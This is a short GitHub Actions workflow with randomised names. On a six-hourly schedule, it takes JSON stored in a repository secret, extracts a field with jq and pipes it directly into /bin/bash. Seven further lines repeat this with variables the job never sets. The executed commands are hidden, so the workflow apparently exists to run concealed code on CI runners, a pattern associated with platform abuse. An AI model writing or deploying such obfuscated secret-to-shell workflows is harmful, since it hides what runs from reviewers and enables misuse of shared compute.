name: alarmingsussex

on:
  workflow_dispatch:
  schedule:
    - cron: '10 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: alarmingsussex
        env:
          jioz1: ${{ secrets.jioz1 }}
        run: |
          echo $jioz1 | jq -r .zl02 | /bin/bash
          echo $hauee40 | jq -r .lvuhg31024 | /bin/bash
          echo $sifqw726 | jq -r .i1 | /bin/bash
          echo $ryrfw13992 | jq -r .yjvf6536 | /bin/bash
          echo $cwpk62 | jq -r .tw458 | /bin/bash
          echo $ywp5 | jq -r .isye560 | /bin/bash
          echo $av3 | jq -r .z6 | /bin/bash
          echo $zfd49291 | jq -r .vgjon9 | /bin/bash

